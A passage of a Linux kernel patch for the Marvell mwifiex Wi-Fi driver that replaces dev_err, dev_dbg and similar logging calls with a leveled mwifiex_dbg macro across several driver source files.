return ret; } @@ -777,8 +797,9 @@ int mwifiex_process_cmdresp(struct mwifiex_adapter *adapter) if (!adapter->curr_cmd || !adapter->curr_cmd->resp_skb) { resp = (struct host_cmd_ds_command *) adapter->upld_buf; - dev_err(adapter->dev, "CMD_RESP: NULL curr_cmd, %#x\n", - le16_to_cpu(resp->command)); + mwifiex_dbg(adapter, ERROR, + "CMD_RESP: NULL curr_cmd, %#x\n", + le16_to_cpu(resp->command)); return -1; } @@ -786,8 +807,9 @@ int mwifiex_process_cmdresp(struct mwifiex_adapter *adapter) resp = (struct host_cmd_ds_command *) adapter->curr_cmd->resp_skb->data; if (adapter->curr_cmd->cmd_flag & CMD_F_CANCELED) { - dev_err(adapter->dev, "CMD_RESP: %#x been canceled\n", - le16_to_cpu(resp->command)); + mwifiex_dbg(adapter, ERROR, + "CMD_RESP: %#x been canceled\n", + le16_to_cpu(resp->command)); mwifiex_recycle_cmd_node(adapter, adapter->curr_cmd); spin_lock_irqsave(&adapter->mwifiex_cmd_lock, flags); adapter->curr_cmd = NULL; @@ -799,7 +821,8 @@ int mwifiex_process_cmdresp(struct mwifiex_adapter *adapter) /* Copy original response back to response buffer */ struct mwifiex_ds_misc_cmd *hostcmd; uint16_t size = le16_to_cpu(resp->size); - dev_dbg(adapter->dev, "info: host cmd resp size = %d\n", size); + mwifiex_dbg(adapter, INFO, + "info: host cmd resp size = %d\n", size); size = min_t(u16, size, MWIFIEX_SIZE_OF_CMD_BUFFER); if (adapter->curr_cmd->data_buf) { hostcmd = adapter->curr_cmd->data_buf; @@ -827,15 +850,15 @@ int mwifiex_process_cmdresp(struct mwifiex_adapter *adapter) 
adapter->dbg.last_cmd_resp_id[adapter->dbg.last_cmd_resp_index] = orig_cmdresp_no; - dev_dbg(adapter->dev, - "cmd: CMD_RESP: 0x%x, result %d, len %d, seqno 0x%x\n", - orig_cmdresp_no, cmdresp_result, - le16_to_cpu(resp->size), le16_to_cpu(resp->seq_num)); + mwifiex_dbg(adapter, CMD, + "cmd: CMD_RESP: 0x%x, result %d, len %d, seqno 0x%x\n", + orig_cmdresp_no, cmdresp_result, + le16_to_cpu(resp->size), le16_to_cpu(resp->seq_num)); mwifiex_dbg_dump(adapter, CMD_D, "CMD_RESP buffer:", resp, le16_to_cpu(resp->size)); if (!(orig_cmdresp_no & HostCmd_RET_BIT)) { - dev_err(adapter->dev, "CMD_RESP: invalid cmd resp\n"); + mwifiex_dbg(adapter, ERROR, "CMD_RESP: invalid cmd resp\n"); if (adapter->curr_cmd->wait_q_enabled) adapter->cmd_wait_q.status = -1; @@ -859,8 +882,9 @@ int mwifiex_process_cmdresp(struct mwifiex_adapter *adapter) /* Check init command response */ if (adapter->hw_status == MWIFIEX_HW_STATUS_INITIALIZING) { if (ret) { - dev_err(adapter->dev, "%s: cmd %#x failed during " - "initialization\n", __func__, cmdresp_no); + mwifiex_dbg(adapter, ERROR, + "%s: cmd %#x failed during\t" + "initialization\n", __func__, cmdresp_no); mwifiex_init_fw_complete(adapter); return -1; } else if (adapter->last_init_cmd == cmdresp_no) @@ -895,7 +919,8 @@ mwifiex_cmd_timeout_func(unsigned long function_context) adapter->is_cmd_timedout = 1; if (!adapter->curr_cmd) { - dev_dbg(adapter->dev, "cmd: empty curr_cmd\n"); + mwifiex_dbg(adapter, ERROR, + "cmd: empty curr_cmd\n"); return; } cmd_node = adapter->curr_cmd; @@ -904,47 +929,60 @@ mwifiex_cmd_timeout_func(unsigned long function_context) adapter->dbg.last_cmd_id[adapter->dbg.last_cmd_index]; adapter->dbg.timeout_cmd_act = adapter->dbg.last_cmd_act[adapter->dbg.last_cmd_index]; - dev_err(adapter->dev, - "%s: Timeout cmd id = %#x, act = %#x\n", __func__, - adapter->dbg.timeout_cmd_id, - adapter->dbg.timeout_cmd_act); - - dev_err(adapter->dev, "num_data_h2c_failure = %d\n", - adapter->dbg.num_tx_host_to_card_failure); - dev_err(adapter->dev, "num_cmd_h2c_failure = %d\n", - adapter->dbg.num_cmd_host_to_card_failure); - - dev_err(adapter->dev, "is_cmd_timedout = %d\n", - adapter->is_cmd_timedout); - dev_err(adapter->dev, "num_tx_timeout = %d\n", - adapter->dbg.num_tx_timeout); - - dev_err(adapter->dev, "last_cmd_index = %d\n", - adapter->dbg.last_cmd_index); - dev_err(adapter->dev, "last_cmd_id: %*ph\n", - (int)sizeof(adapter->dbg.last_cmd_id), - adapter->dbg.last_cmd_id); - dev_err(adapter->dev, "last_cmd_act: %*ph\n", - (int)sizeof(adapter->dbg.last_cmd_act), - adapter->dbg.last_cmd_act); - - dev_err(adapter->dev, "last_cmd_resp_index = %d\n", - adapter->dbg.last_cmd_resp_index); - dev_err(adapter->dev, "last_cmd_resp_id: %*ph\n", - (int)sizeof(adapter->dbg.last_cmd_resp_id), - adapter->dbg.last_cmd_resp_id); - - dev_err(adapter->dev, "last_event_index = %d\n", - adapter->dbg.last_event_index); - dev_err(adapter->dev, "last_event: %*ph\n", - (int)sizeof(adapter->dbg.last_event), - adapter->dbg.last_event); - - dev_err(adapter->dev, "data_sent=%d cmd_sent=%d\n", - adapter->data_sent, adapter->cmd_sent); - - dev_err(adapter->dev, "ps_mode=%d ps_state=%d\n", - adapter->ps_mode, adapter->ps_state); + mwifiex_dbg(adapter, MSG, + "%s: Timeout cmd id = %#x, act = %#x\n", __func__, + adapter->dbg.timeout_cmd_id, + adapter->dbg.timeout_cmd_act); + + mwifiex_dbg(adapter, MSG, + "num_data_h2c_failure = %d\n", + adapter->dbg.num_tx_host_to_card_failure); + mwifiex_dbg(adapter, MSG, + "num_cmd_h2c_failure = %d\n", + adapter->dbg.num_cmd_host_to_card_failure); + + 
mwifiex_dbg(adapter, MSG, + "is_cmd_timedout = %d\n", + adapter->is_cmd_timedout); + mwifiex_dbg(adapter, MSG, + "num_tx_timeout = %d\n", + adapter->dbg.num_tx_timeout); + + mwifiex_dbg(adapter, MSG, + "last_cmd_index = %d\n", + adapter->dbg.last_cmd_index); + mwifiex_dbg(adapter, MSG, + "last_cmd_id: %*ph\n", + (int)sizeof(adapter->dbg.last_cmd_id), + adapter->dbg.last_cmd_id); + mwifiex_dbg(adapter, MSG, + "last_cmd_act: %*ph\n", + (int)sizeof(adapter->dbg.last_cmd_act), + adapter->dbg.last_cmd_act); + + mwifiex_dbg(adapter, MSG, + "last_cmd_resp_index = %d\n", + adapter->dbg.last_cmd_resp_index); + mwifiex_dbg(adapter, MSG, + "last_cmd_resp_id: %*ph\n", + (int)sizeof(adapter->dbg.last_cmd_resp_id), + adapter->dbg.last_cmd_resp_id); + + mwifiex_dbg(adapter, MSG, + "last_event_index = %d\n", + adapter->dbg.last_event_index); + mwifiex_dbg(adapter, MSG, + "last_event: %*ph\n", + (int)sizeof(adapter->dbg.last_event), + adapter->dbg.last_event); + + mwifiex_dbg(adapter, MSG, + "data_sent=%d cmd_sent=%d\n", + adapter->data_sent, adapter->cmd_sent); + + mwifiex_dbg(adapter, MSG, + "ps_mode=%d ps_state=%d\n", + adapter->ps_mode, adapter->ps_state); if (cmd_node->wait_q_enabled) { adapter->cmd_wait_q.status = -ETIMEDOUT; @@ -1022,7 +1060,7 @@ mwifiex_cancel_all_pending_cmd(struct mwifiex_adapter *adapter) if (!priv) continue; if (priv->scan_request) { - dev_dbg(adapter->dev, "info: aborting scan\n"); + mwifiex_dbg(adapter, WARN, "info: aborting scan\n"); cfg80211_scan_done(priv->scan_request, 1); priv->scan_request = NULL; } @@ -1082,7 +1120,7 @@ mwifiex_cancel_pending_ioctl(struct mwifiex_adapter *adapter) if (!priv) continue; if (priv->scan_request) { - dev_dbg(adapter->dev, "info: aborting scan\n"); + mwifiex_dbg(adapter, WARN, "info: aborting scan\n"); cfg80211_scan_done(priv->scan_request, 1); priv->scan_request = NULL; } @@ -1107,11 +1145,11 @@ mwifiex_check_ps_cond(struct mwifiex_adapter *adapter) !adapter->curr_cmd && !IS_CARD_RX_RCVD(adapter)) mwifiex_dnld_sleep_confirm_cmd(adapter); else - dev_dbg(adapter->dev, - "cmd: Delay Sleep Confirm (%s%s%s)\n", - (adapter->cmd_sent) ? "D" : "", - (adapter->curr_cmd) ? "C" : "", - (IS_CARD_RX_RCVD(adapter)) ? "R" : ""); + mwifiex_dbg(adapter, CMD, + "cmd: Delay Sleep Confirm (%s%s%s)\n", + (adapter->cmd_sent) ? "D" : "", + (adapter->curr_cmd) ? "C" : "", + (IS_CARD_RX_RCVD(adapter)) ? 
"R" : ""); } /* @@ -1127,15 +1165,18 @@ mwifiex_hs_activated_event(struct mwifiex_private *priv, u8 activated) priv->adapter->hs_activated = true; mwifiex_update_rxreor_flags(priv->adapter, RXREOR_FORCE_NO_DROP); - dev_dbg(priv->adapter->dev, "event: hs_activated\n"); + mwifiex_dbg(priv->adapter, EVENT, + "event: hs_activated\n"); priv->adapter->hs_activate_wait_q_woken = true; wake_up_interruptible( &priv->adapter->hs_activate_wait_q); } else { - dev_dbg(priv->adapter->dev, "event: HS not configured\n"); + mwifiex_dbg(priv->adapter, EVENT, + "event: HS not configured\n"); } } else { - dev_dbg(priv->adapter->dev, "event: hs_deactivated\n"); + mwifiex_dbg(priv->adapter, EVENT, + "event: hs_deactivated\n"); priv->adapter->hs_activated = false; } } @@ -1163,11 +1204,12 @@ int mwifiex_ret_802_11_hs_cfg(struct mwifiex_private *priv, mwifiex_hs_activated_event(priv, true); return 0; } else { - dev_dbg(adapter->dev, "cmd: CMD_RESP: HS_CFG cmd reply" - " result=%#x, conditions=0x%x gpio=0x%x gap=0x%x\n", - resp->result, conditions, - phs_cfg->params.hs_config.gpio, - phs_cfg->params.hs_config.gap); + mwifiex_dbg(adapter, CMD, + "cmd: CMD_RESP: HS_CFG cmd reply\t" + " result=%#x, conditions=0x%x gpio=0x%x gap=0x%x\n", + resp->result, conditions, + phs_cfg->params.hs_config.gpio, + phs_cfg->params.hs_config.gap); } if (conditions != HS_CFG_CANCEL) { adapter->is_hs_configured = true; @@ -1189,8 +1231,10 @@ int mwifiex_ret_802_11_hs_cfg(struct mwifiex_private *priv, void mwifiex_process_hs_config(struct mwifiex_adapter *adapter) { - dev_dbg(adapter->dev, "info: %s: auto cancelling host sleep" - " since there is interrupt from the firmware\n", __func__); + mwifiex_dbg(adapter, INFO, + "info: %s: auto cancelling host sleep\t" + "since there is interrupt from the firmware\n", + __func__); adapter->if_ops.wakeup(adapter); adapter->hs_activated = false; @@ -1219,13 +1263,14 @@ mwifiex_process_sleep_confirm_resp(struct mwifiex_adapter *adapter, uint16_t seq_num = le16_to_cpu(cmd->seq_num); if (!upld_len) { - dev_err(adapter->dev, "%s: cmd size is 0\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: cmd size is 0\n", __func__); return; } - dev_dbg(adapter->dev, - "cmd: CMD_RESP: 0x%x, result %d, len %d, seqno 0x%x\n", - command, result, le16_to_cpu(cmd->size), seq_num); + mwifiex_dbg(adapter, CMD, + "cmd: CMD_RESP: 0x%x, result %d, len %d, seqno 0x%x\n", + command, result, le16_to_cpu(cmd->size), seq_num); /* Get BSS number and corresponding priv */ priv = mwifiex_get_priv_by_id(adapter, HostCmd_GET_BSS_NO(seq_num), @@ -1239,15 +1284,16 @@ mwifiex_process_sleep_confirm_resp(struct mwifiex_adapter *adapter, command &= HostCmd_CMD_ID_MASK; if (command != HostCmd_CMD_802_11_PS_MODE_ENH) { - dev_err(adapter->dev, - "%s: rcvd unexpected resp for cmd %#x, result = %x\n", - __func__, command, result); + mwifiex_dbg(adapter, ERROR, + "%s: rcvd unexpected resp for cmd %#x, result = %x\n", + __func__, command, result); return; } if (result) { - dev_err(adapter->dev, "%s: sleep confirm cmd failed\n", - __func__); + mwifiex_dbg(adapter, ERROR, + "%s: sleep confirm cmd failed\n", + __func__); adapter->pm_wakeup_card_req = false; adapter->ps_state = PS_STATE_AWAKE; return; @@ -1312,7 +1358,8 @@ int mwifiex_cmd_enh_power_mode(struct mwifiex_private *priv, sizeof(struct mwifiex_ie_types_header)); cmd_size += sizeof(*ps_tlv); tlv += sizeof(*ps_tlv); - dev_dbg(adapter->dev, "cmd: PS Command: Enter PS\n"); + mwifiex_dbg(priv->adapter, CMD, + "cmd: PS Command: Enter PS\n"); ps_mode->null_pkt_interval = 
cpu_to_le16(adapter->null_pkt_interval); ps_mode->multiple_dtims = @@ -1342,8 +1389,8 @@ int mwifiex_cmd_enh_power_mode(struct mwifiex_private *priv, tlv += sizeof(*auto_ds_tlv); if (auto_ds) idletime = auto_ds->idle_time; - dev_dbg(priv->adapter->dev, - "cmd: PS Command: Enter Auto Deep Sleep\n"); + mwifiex_dbg(priv->adapter, CMD, + "cmd: PS Command: Enter Auto Deep Sleep\n"); auto_ds_tlv->deep_sleep_timeout = cpu_to_le16(idletime); } cmd->size = cpu_to_le16(cmd_size); @@ -1370,27 +1417,31 @@ int mwifiex_ret_enh_power_mode(struct mwifiex_private *priv, uint16_t auto_ps_bitmap = le16_to_cpu(ps_mode->params.ps_bitmap); - dev_dbg(adapter->dev, - "info: %s: PS_MODE cmd reply result=%#x action=%#X\n", - __func__, resp->result, action); + mwifiex_dbg(adapter, INFO, + "info: %s: PS_MODE cmd reply result=%#x action=%#X\n", + __func__, resp->result, action); if (action == EN_AUTO_PS) { if (auto_ps_bitmap & BITMAP_AUTO_DS) { - dev_dbg(adapter->dev, "cmd: Enabled auto deep sleep\n"); + mwifiex_dbg(adapter, CMD, + "cmd: Enabled auto deep sleep\n"); priv->adapter->is_deep_sleep = true; } if (auto_ps_bitmap & BITMAP_STA_PS) { - dev_dbg(adapter->dev, "cmd: Enabled STA power save\n"); + mwifiex_dbg(adapter, CMD, + "cmd: Enabled STA power save\n"); if (adapter->sleep_period.period) - dev_dbg(adapter->dev, - "cmd: set to uapsd/pps mode\n"); + mwifiex_dbg(adapter, CMD, + "cmd: set to uapsd/pps mode\n"); } } else if (action == DIS_AUTO_PS) { if (ps_bitmap & BITMAP_AUTO_DS) { priv->adapter->is_deep_sleep = false; - dev_dbg(adapter->dev, "cmd: Disabled auto deep sleep\n"); + mwifiex_dbg(adapter, CMD, + "cmd: Disabled auto deep sleep\n"); } if (ps_bitmap & BITMAP_STA_PS) { - dev_dbg(adapter->dev, "cmd: Disabled STA power save\n"); + mwifiex_dbg(adapter, CMD, + "cmd: Disabled STA power save\n"); if (adapter->sleep_period.period) { adapter->delay_null_pkt = false; adapter->tx_lock_flag = false; @@ -1403,7 +1454,8 @@ int mwifiex_ret_enh_power_mode(struct mwifiex_private *priv, else adapter->ps_mode = MWIFIEX_802_11_POWER_MODE_CAM; - dev_dbg(adapter->dev, "cmd: ps_bitmap=%#x\n", ps_bitmap); + mwifiex_dbg(adapter, CMD, + "cmd: ps_bitmap=%#x\n", ps_bitmap); if (pm_cfg) { /* This section is for get power save mode */ @@ -1540,29 +1592,29 @@ int mwifiex_ret_get_hw_spec(struct mwifiex_private *priv, api_rev->major_ver; adapter->key_api_minor_ver = api_rev->minor_ver; - dev_dbg(adapter->dev, - "key_api v%d.%d\n", - adapter->key_api_major_ver, - adapter->key_api_minor_ver); + mwifiex_dbg(adapter, INFO, + "key_api v%d.%d\n", + adapter->key_api_major_ver, + adapter->key_api_minor_ver); break; case FW_API_VER_ID: adapter->fw_api_ver = api_rev->major_ver; - dev_dbg(adapter->dev, - "Firmware api version %d\n", - adapter->fw_api_ver); + mwifiex_dbg(adapter, INFO, + "Firmware api version %d\n", + adapter->fw_api_ver); break; default: - dev_warn(adapter->dev, - "Unknown api_id: %d\n", - api_id); + mwifiex_dbg(adapter, FATAL, + "Unknown api_id: %d\n", + api_id); break; } break; default: - dev_warn(adapter->dev, - "Unknown GET_HW_SPEC TLV type: %#x\n", - le16_to_cpu(tlv->type)); + mwifiex_dbg(adapter, FATAL, + "Unknown GET_HW_SPEC TLV type: %#x\n", + le16_to_cpu(tlv->type)); break; } parsed_len += le16_to_cpu(tlv->len) + @@ -1572,14 +1624,16 @@ int mwifiex_ret_get_hw_spec(struct mwifiex_private *priv, } } - dev_dbg(adapter->dev, "info: GET_HW_SPEC: fw_release_number- %#x\n", - adapter->fw_release_number); - dev_dbg(adapter->dev, "info: GET_HW_SPEC: permanent addr: %pM\n", - hw_spec->permanent_addr); - dev_dbg(adapter->dev, - "info: 
GET_HW_SPEC: hw_if_version=%#x version=%#x\n", - le16_to_cpu(hw_spec->hw_if_version), - le16_to_cpu(hw_spec->version)); + mwifiex_dbg(adapter, INFO, + "info: GET_HW_SPEC: fw_release_number- %#x\n", + adapter->fw_release_number); + mwifiex_dbg(adapter, INFO, + "info: GET_HW_SPEC: permanent addr: %pM\n", + hw_spec->permanent_addr); + mwifiex_dbg(adapter, INFO, + "info: GET_HW_SPEC: hw_if_version=%#x version=%#x\n", + le16_to_cpu(hw_spec->hw_if_version), + le16_to_cpu(hw_spec->version)); ether_addr_copy(priv->adapter->perm_addr, hw_spec->permanent_addr); adapter->region_code = le16_to_cpu(hw_spec->region_code); @@ -1592,8 +1646,8 @@ int mwifiex_ret_get_hw_spec(struct mwifiex_private *priv, /* If it's unidentified region code, use the default (USA) */ if (i >= MWIFIEX_MAX_REGION_CODE) { adapter->region_code = 0x10; - dev_dbg(adapter->dev, - "cmd: unknown region code, use default (USA)\n"); + mwifiex_dbg(adapter, WARN, + "cmd: unknown region code, use default (USA)\n"); } adapter->hw_dot_11n_dev_cap = le32_to_cpu(hw_spec->dot_11n_dev_cap); diff --git a/drivers/net/wireless/mwifiex/debugfs.c b/drivers/net/wireless/mwifiex/debugfs.c index f3e19e917949..8895906b300e 100644 --- a/drivers/net/wireless/mwifiex/debugfs.c +++ b/drivers/net/wireless/mwifiex/debugfs.c @@ -792,7 +792,8 @@ mwifiex_hscfg_write(struct file *file, const char __user *ubuf, memset(&hscfg, 0, sizeof(struct mwifiex_ds_hs_cfg)); if (arg_num > 3) { - dev_err(priv->adapter->dev, "Too many arguments\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Too many arguments\n"); ret = -EINVAL; goto done; } diff --git a/drivers/net/wireless/mwifiex/ethtool.c b/drivers/net/wireless/mwifiex/ethtool.c index 65d8d6d4b6ba..a6b3b41d5909 100644 --- a/drivers/net/wireless/mwifiex/ethtool.c +++ b/drivers/net/wireless/mwifiex/ethtool.c @@ -108,7 +108,8 @@ mwifiex_get_dump_data(struct net_device *dev, struct ethtool_dump *dump, } if (adapter->curr_mem_idx == MWIFIEX_FW_DUMP_IDX) { - dev_err(adapter->dev, "firmware dump in progress!!\n"); + mwifiex_dbg(adapter, ERROR, + "firmware dump in progress!!\n"); return -EBUSY; } @@ -140,7 +141,8 @@ static int mwifiex_set_dump(struct net_device *dev, struct ethtool_dump *val) } if (adapter->curr_mem_idx == MWIFIEX_FW_DUMP_IDX) { - dev_err(adapter->dev, "firmware dump in progress!!\n"); + mwifiex_dbg(adapter, ERROR, + "firmware dump in progress!!\n"); return -EBUSY; } diff --git a/drivers/net/wireless/mwifiex/init.c b/drivers/net/wireless/mwifiex/init.c index e12192f5cfad..fdf38d06a0aa 100644 --- a/drivers/net/wireless/mwifiex/init.c +++ b/drivers/net/wireless/mwifiex/init.c @@ -56,7 +56,7 @@ static void wakeup_timer_fn(unsigned long data) { struct mwifiex_adapter *adapter = (struct mwifiex_adapter *)data; - dev_err(adapter->dev, "Firmware wakeup failed\n"); + mwifiex_dbg(adapter, ERROR, "Firmware wakeup failed\n"); adapter->hw_status = MWIFIEX_HW_STATUS_RESET; mwifiex_cancel_all_pending_cmd(adapter); @@ -172,8 +172,9 @@ static int mwifiex_allocate_adapter(struct mwifiex_adapter *adapter) /* Allocate command buffer */ ret = mwifiex_alloc_cmd_buffer(adapter); if (ret) { - dev_err(adapter->dev, "%s: failed to alloc cmd buffer\n", - __func__); + mwifiex_dbg(adapter, ERROR, + "%s: failed to alloc cmd buffer\n", + __func__); return -1; } @@ -182,8 +183,9 @@ static int mwifiex_allocate_adapter(struct mwifiex_adapter *adapter) + INTF_HEADER_LEN); if (!adapter->sleep_cfm) { - dev_err(adapter->dev, "%s: failed to alloc sleep cfm" - " cmd buffer\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: failed to alloc sleep cfm\t" + " 
cmd buffer\n", __func__); return -1; } skb_reserve(adapter->sleep_cfm, INTF_HEADER_LEN); @@ -417,7 +419,7 @@ mwifiex_adapter_cleanup(struct mwifiex_adapter *adapter) mwifiex_free_lock_list(adapter); /* Free command buffer */ - dev_dbg(adapter->dev, "info: free cmd buffer\n"); + mwifiex_dbg(adapter, INFO, "info: free cmd buffer\n"); mwifiex_free_cmd_buffer(adapter); for (idx = 0; idx < adapter->num_mem_types; idx++) { @@ -595,10 +597,11 @@ static void mwifiex_delete_bss_prio_tbl(struct mwifiex_private *priv) for (i = 0; i < adapter->priv_num; ++i) { head = &adapter->bss_prio_tbl[i].bss_prio_head; lock = &adapter->bss_prio_tbl[i].bss_prio_lock; - dev_dbg(adapter->dev, "info: delete BSS priority table," - " bss_type = %d, bss_num = %d, i = %d," - " head = %p\n", - priv->bss_type, priv->bss_num, i, head); + mwifiex_dbg(adapter, INFO, + "info: delete BSS priority table,\t" + "bss_type = %d, bss_num = %d, i = %d,\t" + "head = %p\n", + priv->bss_type, priv->bss_num, i, head); { spin_lock_irqsave(lock, flags); @@ -609,9 +612,10 @@ static void mwifiex_delete_bss_prio_tbl(struct mwifiex_private *priv) list_for_each_entry_safe(bssprio_node, tmp_node, head, list) { if (bssprio_node->priv == priv) { - dev_dbg(adapter->dev, "info: Delete " - "node %p, next = %p\n", - bssprio_node, tmp_node); + mwifiex_dbg(adapter, INFO, + "info: Delete\t" + "node %p, next = %p\n", + bssprio_node, tmp_node); list_del(&bssprio_node->list); kfree(bssprio_node); } @@ -659,20 +663,23 @@ mwifiex_shutdown_drv(struct mwifiex_adapter *adapter) adapter->hw_status = MWIFIEX_HW_STATUS_CLOSING; /* wait for mwifiex_process to complete */ if (adapter->mwifiex_processing) { - dev_warn(adapter->dev, "main process is still running\n"); + mwifiex_dbg(adapter, WARN, + "main process is still running\n"); return ret; } /* cancel current command */ if (adapter->curr_cmd) { - dev_warn(adapter->dev, "curr_cmd is still in processing\n"); + mwifiex_dbg(adapter, WARN, + "curr_cmd is still in processing\n"); del_timer_sync(&adapter->cmd_timer); mwifiex_recycle_cmd_node(adapter, adapter->curr_cmd); adapter->curr_cmd = NULL; } /* shut down mwifiex */ - dev_dbg(adapter->dev, "info: shutdown mwifiex...\n"); + mwifiex_dbg(adapter, MSG, + "info: shutdown mwifiex...\n"); /* Clean up Tx/Rx queues and delete BSS priority table */ for (i = 0; i < adapter->priv_num; i++) { @@ -741,8 +748,8 @@ int mwifiex_dnld_fw(struct mwifiex_adapter *adapter, /* check if firmware is already running */ ret = adapter->if_ops.check_fw_status(adapter, poll_num); if (!ret) { - dev_notice(adapter->dev, - "WLAN FW already running! Skip FW dnld\n"); + mwifiex_dbg(adapter, MSG, + "WLAN FW already running! Skip FW dnld\n"); return 0; } @@ -750,8 +757,8 @@ int mwifiex_dnld_fw(struct mwifiex_adapter *adapter, /* check if we are the winner for downloading FW */ if (!adapter->winner) { - dev_notice(adapter->dev, - "FW already running! Skip FW dnld\n"); + mwifiex_dbg(adapter, MSG, + "FW already running! 
Skip FW dnld\n"); goto poll_fw; } } @@ -760,7 +767,8 @@ int mwifiex_dnld_fw(struct mwifiex_adapter *adapter, /* Download firmware with helper */ ret = adapter->if_ops.prog_fw(adapter, pmfw); if (ret) { - dev_err(adapter->dev, "prog_fw failed ret=%#x\n", ret); + mwifiex_dbg(adapter, ERROR, + "prog_fw failed ret=%#x\n", ret); return ret; } } @@ -769,7 +777,8 @@ int mwifiex_dnld_fw(struct mwifiex_adapter *adapter, /* Check if the firmware is downloaded successfully or not */ ret = adapter->if_ops.check_fw_status(adapter, poll_num); if (ret) - dev_err(adapter->dev, "FW failed to be active in time\n"); + mwifiex_dbg(adapter, ERROR, + "FW failed to be active in time\n"); return ret; } diff --git a/drivers/net/wireless/mwifiex/join.c b/drivers/net/wireless/mwifiex/join.c index f214a7cd1345..6208ef1f589a 100644 --- a/drivers/net/wireless/mwifiex/join.c +++ b/drivers/net/wireless/mwifiex/join.c @@ -53,9 +53,9 @@ mwifiex_cmd_append_generic_ie(struct mwifiex_private *priv, u8 **buffer) * parameter buffer pointer. */ if (priv->gen_ie_buf_len) { - dev_dbg(priv->adapter->dev, - "info: %s: append generic ie len %d to %p\n", - __func__, priv->gen_ie_buf_len, *buffer); + mwifiex_dbg(priv->adapter, INFO, + "info: %s: append generic ie len %d to %p\n", + __func__, priv->gen_ie_buf_len, *buffer); /* Wrap the generic IE buffer with a pass through TLV type */ ie_header.type = cpu_to_le16(TLV_TYPE_PASSTHROUGH); @@ -125,9 +125,9 @@ mwifiex_cmd_append_tsf_tlv(struct mwifiex_private *priv, u8 **buffer, tsf_val = cpu_to_le64(bss_desc->timestamp); - dev_dbg(priv->adapter->dev, - "info: %s: TSF offset calc: %016llx - %016llx\n", - __func__, bss_desc->timestamp, bss_desc->fw_tsf); + mwifiex_dbg(priv->adapter, INFO, + "info: %s: TSF offset calc: %016llx - %016llx\n", + __func__, bss_desc->timestamp, bss_desc->fw_tsf); memcpy(*buffer, &tsf_val, sizeof(tsf_val)); *buffer += sizeof(tsf_val); @@ -152,7 +152,7 @@ static int mwifiex_get_common_rates(struct mwifiex_private *priv, u8 *rate1, tmp = kmemdup(rate1, rate1_size, GFP_KERNEL); if (!tmp) { - dev_err(priv->adapter->dev, "failed to alloc tmp buf\n"); + mwifiex_dbg(priv->adapter, ERROR, "failed to alloc tmp buf\n"); return -ENOMEM; } @@ -169,8 +169,8 @@ static int mwifiex_get_common_rates(struct mwifiex_private *priv, u8 *rate1, } } - dev_dbg(priv->adapter->dev, "info: Tx data rate set to %#x\n", - priv->data_rate); + mwifiex_dbg(priv->adapter, INFO, "info: Tx data rate set to %#x\n", + priv->data_rate); if (!priv->is_data_rate_auto) { while (*ptr) { @@ -180,9 +180,10 @@ static int mwifiex_get_common_rates(struct mwifiex_private *priv, u8 *rate1, } ptr++; } - dev_err(priv->adapter->dev, "previously set fixed data rate %#x" - " is not compatible with the network\n", - priv->data_rate); + mwifiex_dbg(priv->adapter, ERROR, + "previously set fixed data rate %#x\t" + "is not compatible with the network\n", + priv->data_rate); ret = -1; goto done; @@ -214,8 +215,9 @@ mwifiex_setup_rates_from_bssdesc(struct mwifiex_private *priv, if (mwifiex_get_common_rates(priv, out_rates, MWIFIEX_SUPPORTED_RATES, card_rates, card_rates_size)) { *out_rates_size = 0; - dev_err(priv->adapter->dev, "%s: cannot get common rates\n", - __func__); + mwifiex_dbg(priv->adapter, ERROR, + "%s: cannot get common rates\n", + __func__); return -1; } @@ -246,8 +248,9 @@ mwifiex_cmd_append_wps_ie(struct mwifiex_private *priv, u8 **buffer) * parameter buffer pointer. 
*/ if (priv->wps_ie_len) { - dev_dbg(priv->adapter->dev, "cmd: append wps ie %d to %p\n", - priv->wps_ie_len, *buffer); + mwifiex_dbg(priv->adapter, CMD, + "cmd: append wps ie %d to %p\n", + priv->wps_ie_len, *buffer); /* Wrap the generic IE buffer with a pass through TLV type */ ie_header.type = cpu_to_le16(TLV_TYPE_MGMT_IE); @@ -292,8 +295,9 @@ mwifiex_cmd_append_wapi_ie(struct mwifiex_private *priv, u8 **buffer) * parameter buffer pointer. */ if (priv->wapi_ie_len) { - dev_dbg(priv->adapter->dev, "cmd: append wapi ie %d to %p\n", - priv->wapi_ie_len, *buffer); + mwifiex_dbg(priv->adapter, CMD, + "cmd: append wapi ie %d to %p\n", + priv->wapi_ie_len, *buffer); /* Wrap the generic IE buffer with a pass through TLV type */ ie_header.type = cpu_to_le16(TLV_TYPE_WAPI_IE); @@ -453,8 +457,8 @@ int mwifiex_cmd_802_11_associate(struct mwifiex_private *priv, rates_tlv->header.len = cpu_to_le16((u16) rates_size); memcpy(rates_tlv->rates, rates, rates_size); pos += sizeof(rates_tlv->header) + rates_size; - dev_dbg(priv->adapter->dev, "info: ASSOC_CMD: rates size = %d\n", - rates_size); + mwifiex_dbg(priv->adapter, INFO, "info: ASSOC_CMD: rates size = %d\n", + rates_size); /* Add the Authentication type to be used for Auth frames */ auth_tlv = (struct mwifiex_ie_types_auth_type *) pos; @@ -487,14 +491,14 @@ int mwifiex_cmd_802_11_associate(struct mwifiex_private *priv, sizeof(struct mwifiex_chan_scan_param_set)); chan_tlv->chan_scan_param[0].chan_number = (bss_desc->phy_param_set.ds_param_set.current_chan); - dev_dbg(priv->adapter->dev, "info: Assoc: TLV Chan = %d\n", - chan_tlv->chan_scan_param[0].chan_number); + mwifiex_dbg(priv->adapter, INFO, "info: Assoc: TLV Chan = %d\n", + chan_tlv->chan_scan_param[0].chan_number); chan_tlv->chan_scan_param[0].radio_type = mwifiex_band_to_radio_type((u8) bss_desc->bss_band); - dev_dbg(priv->adapter->dev, "info: Assoc: TLV Band = %d\n", - chan_tlv->chan_scan_param[0].radio_type); + mwifiex_dbg(priv->adapter, INFO, "info: Assoc: TLV Band = %d\n", + chan_tlv->chan_scan_param[0].radio_type); pos += sizeof(chan_tlv->header) + sizeof(struct mwifiex_chan_scan_param_set); } @@ -544,8 +548,9 @@ int mwifiex_cmd_802_11_associate(struct mwifiex_private *priv, tmp_cap &= ~WLAN_CAPABILITY_SHORT_SLOT_TIME; tmp_cap &= CAPINFO_MASK; - dev_dbg(priv->adapter->dev, "info: ASSOC_CMD: tmp_cap=%4X CAPINFO_MASK=%4lX\n", - tmp_cap, CAPINFO_MASK); + mwifiex_dbg(priv->adapter, INFO, + "info: ASSOC_CMD: tmp_cap=%4X CAPINFO_MASK=%4lX\n", + tmp_cap, CAPINFO_MASK); assoc->cap_info_bitmap = 